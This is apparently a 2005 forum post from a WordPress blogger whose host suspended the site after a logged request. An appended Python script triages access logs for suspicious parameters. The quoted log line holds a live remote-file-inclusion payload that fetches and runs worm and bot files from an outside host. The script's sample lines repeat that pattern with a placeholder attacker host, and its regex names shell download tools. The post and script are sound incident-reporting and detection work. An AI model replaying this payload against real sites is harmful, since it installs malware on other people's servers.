Was this a hack attempt? Did my web host over-react?
My site was down from about noon yesterday (CDT) until just now when I upgraded to WP 1.2.2.
My webhost found this entry in my server logs and shut the site down:
babygotblog.com - 22.214.171.124 - - [02/Jan/2005:12:06:57 -0500] "GET /index.php?p=http://www.5wk.com/spy.gif?&cmd=cd%20/tmp;wget%20http://www.5wk.com/spyworm1;perl%20spyworm1;wget%20http://www.5wk.com/spybot HTTP/1.1" 403 - "-" "LWP::Simple/5.76"
With the comment,
That is not dealing with the Comment SPAM issue, that is an attempt to hack into your account. You need to make sure that you are running the latest version of the software and that all known security holes are patched. If you come into chat when you are ready to fix your site we can unsuspend your site.
All’s well that ends well, I suppose, but what troubles me is that I had something gobble up 5GB of bandwidth a couple of weekends ago and posted my solution on my blog, part of which was to disallow, via the .htaccess file, the user agent LWP::Simple. Yet, it appears this was part and parcel of the hack/script/string cited above. Does this mean that .htaccess “trick” is not working? (Bandwidth usage has settled back down to normal again, at least.)
Any thoughts as to anything further I might do to forestall such an occurrence in the future other than to always run the latest stable WP?
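An added example, not part of the original post: a log triage script that parses access-log lines in the format quoted above, flags query parameters carrying a remote URL or a shell command, and reports from the status code whether the server refused or served each request. The sample lines, the `attacker.example` and `blog.example` hosts, the flag names and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Vhost-prefixed combined log format, matching the shape of the line in the post.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) - (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A parameter whose whole value is a remote URL (remote file inclusion probe).
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# A parameter value that starts a shell command, or chains one after ; | & `
SHELL_CMD = re.compile(r'(?:^|[;|&`]\s*)(?:cd|wget|curl|perl|sh|bash|chmod)\b', re.I)

def analyze(line):
    """Return a finding dict for a suspicious request, or None if nothing is flagged."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _, _, query = m['target'].partition('?')
    flags = set()
    for pair in query.split('&'):
        _, _, raw = pair.partition('=')
        value = unquote(raw)  # decode %20 etc. before matching
        if REMOTE_URL.match(value):
            flags.add('remote-url-param')
        if SHELL_CMD.search(value):
            flags.add('shell-command')
    if not flags:
        return None
    status = int(m['status'])
    if status in (401, 403):
        outcome = 'refused'   # server denied the request
    elif 200 <= status < 300:
        outcome = 'served'    # request reached the application: review it
    else:
        outcome = 'other'
    return {'ip': m['ip'], 'agent': m['agent'], 'status': status,
            'outcome': outcome, 'flags': sorted(flags)}

# Constructed sample lines (documentation IPs and placeholder hosts).
SAMPLE = [
    'blog.example - 192.0.2.10 - - [02/Jan/2005:12:06:57 -0500] "GET /index.php?p=http://attacker.example/x.gif?&cmd=cd%20/tmp;wget%20http://attacker.example/w HTTP/1.1" 403 - "-" "LWP::Simple/5.76"',
    'blog.example - 192.0.2.11 - - [02/Jan/2005:12:07:30 -0500] "GET /index.php?p=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'blog.example - 192.0.2.12 - - [02/Jan/2005:12:09:02 -0500] "GET /index.php?p=http://attacker.example/x.gif?&cmd=id HTTP/1.1" 200 812 "-" "LWP::Simple/5.76"',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        print(analyze(entry))
```

A `served` finding is the one to investigate first; a `refused` finding shows the request was denied, though the log line alone does not say which rule denied it.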